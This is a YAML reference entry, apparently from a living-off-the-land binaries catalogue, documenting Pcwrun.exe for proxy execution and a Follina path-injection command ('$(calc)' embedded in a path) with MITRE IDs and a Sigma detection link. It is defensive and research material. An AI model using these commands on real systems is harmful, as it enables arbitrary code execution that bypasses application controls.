---
Name: Pcwrun.exe
Description: Program Compatibility Wizard
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Pcwrun.exe {PATH_ABSOLUTE:.exe}
    Description: Open the target .EXE file with the Program Compatibility Wizard.
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: Pcwrun.exe /../../$(calc).exe
    Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\pcwrun.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
Resources:
  - Link: https://twitter.com/pabraeken/status/991335019833708544
  - Link: https://twitter.com/nas_bench/status/1535663791362519040
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'
